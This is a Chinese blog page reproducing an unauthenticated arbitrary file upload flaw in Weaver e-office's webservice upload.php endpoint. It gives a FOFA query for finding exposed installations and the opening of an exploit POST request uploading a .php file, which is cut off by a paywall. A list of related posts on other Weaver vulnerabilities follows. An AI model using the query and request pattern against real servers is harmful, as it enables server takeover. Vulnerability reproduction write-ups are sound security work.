【漏洞复现】泛微OA e-office webservice 任意文件上传漏洞

最新推荐文章于 2025-03-16 20:41:43 发布

从不学安全

最新推荐文章于 2025-03-16 20:41:43 发布

阅读量1k

点赞数 4

分类专栏：漏洞复现文章标签：安全 php

本文链接：https://blog.csdn.net/qq_67810151/article/details/138192453

版权

漏洞复现专栏收录该内容

99 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了泛微OA e-office的webservice接口存在的任意文件上传漏洞，该漏洞允许未授权攻击者上传恶意脚本，可能造成服务器被控制。文章通过0x02漏洞概述、0x04漏洞复现等章节，逐步揭示了漏洞细节和影响范围。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x01 产品简介

泛微e-office是泛微旗下的一款标准协同移动办公平台。主要面向中小企业,平台全方位覆盖日常办公场景,可以有效提升组织管理与协同效率。

0x02 漏洞概述

泛微e-office /webservice/upload/upload.php接口存在任意文件上传漏洞。未收取的攻击者可以通过该漏洞上传恶意脚本文件，从而控制服务器。

0x03 测绘语句

fofa: body="eoffice"

0x04 漏洞复现

1、上传文件：

POST /webservice/upload/upload.php HTTP/1.1

Host:

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryybgofwiy



------WebKitFormBoundaryybgofwiy

Content-Disposition: form-data; name="file"; filename="321.php"

Content

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

从不学安全

关注关注

4
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

泛微E-Office任意文件上传漏洞复现

0xSec

08-12

2925

泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 9.5版本源文件/webservice/upload.php接口处存在任意文件上传漏洞，未经身份验证的恶意攻击者可以上传恶意文件，从而获取目标服务器的控制权限。

【漏洞复现】CERIO DT系列路由器远程代码执行漏洞

qq_67810151的博客

03-13

612

CERIO DT系列路由器在特定版本中存在操作命令注入漏洞。未授权的攻击者可利用该漏洞进行远程代码执行，从而控制服务器。

参与评论您还未登录，请先登录后发表或查看评论

文件上传漏洞（详解）

最新发布

xiexierong的博客

03-16

791

将客户端数据以文件形式封装，通过网络协议发送到服务器端。在服务器端解析数据，最终在服务端硬盘上作为真实的文件保存。通常一个文件以HTTP协议进行上传时，将以POST请求发送至Web服务器，Web服务器收到请求并同意后，用户与Web服务器将建立连接，并传输数据。文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的，"文件上传"本身没有问题，有问题的是文件上传后，服务器怎么处理、解释文件。

泛微 E-Office 任意文件上传漏洞 CVE-2023-2648（漏洞复现）

LHBD_R的博客

06-21

3335

漏洞介绍：泛微 E-Office 9.5版本中文件上传处理程序接口uploadify.php参数Filedata的操作导致任意文件上传，攻击者可以通过远程控制接口上传恶意文件

泛微E-Office最新文件上传漏洞（CNVD-2021-49104）

swordheart的博客

12-02

4657

0x00 漏洞介绍泛微e-office是泛微旗下的一款标准协同移动办公平台。主要面向中小企业。该漏洞是由于 e-office 未能正确处理上传模块中用户输入导致的，攻击者可以构造恶意的上传数据包，实现任意代码执行。 0x01 漏洞版本泛微 e-office v9.0 0x02 漏洞复现 poc如下 POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTT...

泛微云桥前台文件上传漏洞-202408

网络安全。

08-18

1654

静态分析代码流程：先看方法有没有声明，没有声明使用 jd-gui 反编译工具 search 搜索要跳转的类方法，定位到后再去 idea 里查看有无声明，再无声明可结合 jd-gui、jar-analyzer工具搜索查找。动态分析：每一步都可以打断点动态分析一下，可以随时在每一步骤中用到的方法进行断点分析。

【漏洞复现】泛微E-Office uploadfile.php 任意文件上传漏洞

qq_34780861的博客

04-23

572

在/general/index/UploadFile.php中上传文件过滤不严格导致允许无限制地上传文件，攻击者可以通过该漏洞直接获取网站权限。

【漏洞复现】泛微OA E-Office do_excel.php 任意文件写入漏洞

qq_48368964的博客

10-01

1528

泛微OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验，攻击者可以通过构造特定的请求，将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件，如 WebShel 或系统脚本，从而在服务器上执行任意命令，访问敏感数据，甚至完全接管服务器。泛微0-0fice是一款标准化的协同 OA办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。

【nday】复现泛微OA e-cology XXE 漏洞——可读取任意文件

记录并分享学习安全的知识点..

07-14

3060

泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology某处功能点最初针对用户输入的过滤不太完善，导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过，本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件，甚至可能获取应用系统的管理员权限。

【漏洞复现】泛微OA E-Cology ResourceServlet文件读取漏洞

晚风不及你

05-14

952

泛微OA E-Cology ResourceServlet存在任意文件读取漏洞，允许未经授权的用户读取服务器上的敏感配置文件。

泛微E-Office前台文件上传漏洞

失心少年

06-20

1000

我们在第108行调用doc2text（），然后追溯到doc2txt（）参数$FILE_PATH的源，连接附件目录（C:\eoffice9\webroot\ATTACHMENT）的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值，以获得完整的文件路径。天擎攻防实验室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。

泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）

热门推荐

0xSec

05-23

1万+

泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 9.5版本，源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。参数 upload_quwan 的操作导致不受限制的上传，未经身份验证的恶意攻击者通过上传恶意文件，从而获取目标服务器的控制权限。

泛微OA E-Office V10 OfficeServer 任意文件上传漏洞复现

故事讲予风听

10-20

3508

泛微e-ofice是一款标准化的协同0A办公软件，泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞，攻击者可以上传任意文件，获取webshell，在服务器上执行任意命令、读取敏感信息等。

泛微 E-Office 9.5版本存在ajax.php接口任意文件上传漏洞

wan___she__pi的博客

04-19

746

泛微 E-Office 9.5版本存在代码问题漏洞，泛微e-office系统ajax.php接口存在任意文件上传漏洞。

泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)

Ms08067安全实验室

12-14

6235

文章来源｜MS08067 Web安全知识星球本文作者：Taoing（Web漏洞挖掘班讲师）参考：https://cnvd.org.cn/flaw/show/CNVD-2021-49104 ...

CNVD-2021-49104——泛微E-Office文件上传漏洞

qq_53086690的博客

12-02

3273

CNVD-2021-49104——泛微E-Office文件上传漏洞 E-Office简介 e-office是一款移动协同办公平台,平台全方位覆盖日常办公场景,可以有效提升组织管理与协同效率,可以帮助更好的工作。影响版本泛微e-office V9.0 漏洞概述泛微存在文件上传漏洞。攻击者可利用漏洞上传webshell，获得服务器权限。漏洞复现 exp可以加微信公众号获取 ...

漏洞复现泛微OA E-Cology V9 browser.jsp SQL注入漏洞

qq_50854662的博客

03-20

8408

漏洞复现泛微OA E-Cology V9 browser.jsp SQL注入漏洞

漏洞复现-泛微WeaverOA系列

aming小老弟

10-03

1887

泛微OA

【漏洞复现】泛微-云桥e-Bridge EC8.0 文件上传

今天是几号的博客

08-06

2472

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。泛微-云桥是一款基于云计算技术的企业级协作与办公平台，提供文档管理、流程审批、项目协作等功能，旨在提升企业内部沟通效率与工作协同能力。本文所涉及的任何技术、信息或工具，仅供学习和参考之用。